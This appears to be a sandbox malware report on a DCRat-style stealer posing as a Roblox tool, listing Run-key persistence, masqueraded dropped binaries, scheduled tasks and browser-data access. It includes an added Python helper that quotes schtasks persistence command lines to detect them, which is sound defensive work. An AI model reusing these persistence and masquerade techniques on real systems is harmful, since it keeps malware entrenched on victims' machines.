N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\DriversavessessionDlldhcp\cmd.exe N/A
N/A N/A N/A N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\DriversavessessionDlldhcp\Roblox.exe N/A
N/A N/A C:\Windows\system32\wbem\WmiApSrv.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\winNet\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Sidebar\\TextInputHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\All Users\\Templates\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\winNet\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Program Files\\7-Zip\\Lang\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Recovery\\WindowsRE\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\All Users\\Start Menu\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Recovery\\WindowsRE\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\All Users\\Templates\\msiexec.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSCEDEE80FABE974800B5DBB2ADA3AD378B.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\sobql9.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\Office16\services.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\ModifiableWindowsApps\spoolsv.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\7-Zip\Lang\a0b1fd4c5438e9 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Sidebar\TextInputHost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\TextInputHost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Microsoft Office\Office16\services.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\Windows NT\TableTextService\en-US\conhost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\088424020bedd6 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\7-Zip\Lang\Refcrt.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files (x86)\Google\33f6b6f444b053 C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\Windows NT\TableTextService\en-US\CSCCF1AAFE95DF4408AFAA786A37D33121.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\7-Zip\Lang\Refcrt.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files (x86)\Google\ComContainerbrowserRefRuntime.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Program Files\7-Zip\Lang\CSC6C23FC88DE514248B2B06EB9A779747D.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Program Files\Microsoft Office\Office16\c5b4cb5e9653cc C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Program Files\Windows Sidebar\22eafd247d37c3 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Program Files\Microsoft Office\Office16\CSC13CEFDF3D78F44CBB74210E0B4722E24.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\Windows Sidebar\CSC4DA05245C94C4B5D9D4CDA48E3EE2C5B.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Program Files\Windows Sidebar\TextInputHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e57d11b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57d11b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF08F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID34E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE7A4.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\CSC\spoolsv.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\xdwd.dll C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
File opened for modification C:\Windows\Installer\MSIF05F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID38D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID39E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
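The Run values above and the schtasks /create command lines listed under Processes share one pattern: every dropped binary carries the name of a real Windows component (msiexec.exe, services.exe, conhost.exe, RuntimeBroker.exe, WmiPrvSE.exe, smss.exe) but lives outside the system directories, and each gets a pair of tasks, one /sc ONLOGON /rl HIGHEST and one /sc MINUTE /mo N with a one-letter suffix on the task name. The helper below is an added triage example written for this report, not code from the sandbox or from the sample; it pulls the .exe paths out of report lines and flags name/location mismatches, and parses the schtasks switches so the per-binary task pairs can be grouped. SYSTEM_BINARY_NAMES and LEGIT_DIRS are this example's own assumptions (a typical 64-bit client), and the sample lines are transcribed from this report.

```python
"""Flag persistence targets that reuse a Windows system-binary name from a
non-system directory, and group schtasks /create entries by target.

Added example for this report; not sandbox or sample code. The name list and
the directory allow-list are assumptions chosen to fit this report."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath
from typing import Dict, List, Optional, Tuple

# Names the sample reuses for its dropped copies (assumption: illustrative, not exhaustive).
SYSTEM_BINARY_NAMES = {
    "msiexec.exe", "services.exe", "conhost.exe", "runtimebroker.exe",
    "wmiprvse.exe", "smss.exe", "spoolsv.exe", "textinputhost.exe", "cmd.exe",
}
# Where those names legitimately live on a 64-bit client (assumption).
LEGIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\system32\wbem"}

# Any drive-letter path ending in .exe; registry exports double the backslashes.
PATH_RE = re.compile(r"""[A-Za-z]:\\+[^"']*?\.exe""", re.IGNORECASE)
# The schtasks switches that matter for persistence triage.
SCHTASKS_RE = re.compile(
    r"""/tn\s+"(?P<tn>[^"]+)".*?/sc\s+(?P<sc>\w+)(?:\s+/mo\s+(?P<mo>\d+))?"""
    r""".*?/tr\s+"'?(?P<tr>[^"']+)'?"(?:.*?/rl\s+(?P<rl>\w+))?""",
    re.IGNORECASE,
)

# Constructed sample input, transcribed from this report's Run-key rows and
# schtasks command lines; the last line is a benign control (real msiexec, real path).
SAMPLE_LINES = [
    r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Recovery\\WindowsRE\\msiexec.exe\""',
    r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\conhost.exe\""',
    r'\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\""',
    r'''schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f''',
    r'''schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office16\services.exe'" /rl HIGHEST /f''',
    r"C:\Windows\system32\msiexec.exe /V",
]


def extract_exe_paths(line: str) -> List[str]:
    """Return the .exe paths in a report line, collapsing doubled backslashes."""
    return [m.replace("\\\\", "\\") for m in PATH_RE.findall(line)]


def is_masquerade(path: str) -> bool:
    """True when the file name is a known system binary but its directory is not a system one."""
    p = PureWindowsPath(path)
    return p.name.lower() in SYSTEM_BINARY_NAMES and str(p.parent).lower() not in LEGIT_DIRS


def parse_schtasks(cmd: str) -> Optional[dict]:
    """Pull task name, schedule, interval, target and run level from a schtasks /create line."""
    m = SCHTASKS_RE.search(cmd)
    if not m:
        return None
    d = m.groupdict()
    d["mo"] = int(d["mo"]) if d["mo"] else None
    return d


def triage_persistence(lines) -> Tuple[List[str], Dict[str, List[dict]]]:
    """Return (sorted masquerading paths, scheduled tasks grouped by target binary)."""
    flagged = set()
    tasks = defaultdict(list)
    for line in lines:
        for path in extract_exe_paths(line):
            if is_masquerade(path):
                flagged.add(path)
        task = parse_schtasks(line)
        if task:
            tasks[task["tr"]].append(task)
    return sorted(flagged), dict(tasks)


if __name__ == "__main__":
    flagged, tasks = triage_persistence(SAMPLE_LINES)
    for path in flagged:
        print("masquerade:", path)
    for target, entries in tasks.items():
        sched = ", ".join(
            f"{t['tn']}={t['sc']}" + (f"/{t['mo']}min" if t["mo"] else "") + (f" rl={t['rl']}" if t["rl"] else "")
            for t in entries
        )
        print(f"task target {target}: {sched}")
```

Roblox.exe is deliberately not flagged: it is not a system-binary name, so this check alone says nothing about it, and the masquerade filter is meant as one pivot on top of the report's Run and schtasks tables, not a verdict. On a live host the same two functions can be fed the output of a registry export and of schtasks /query /fo LIST /v instead of report lines.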

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
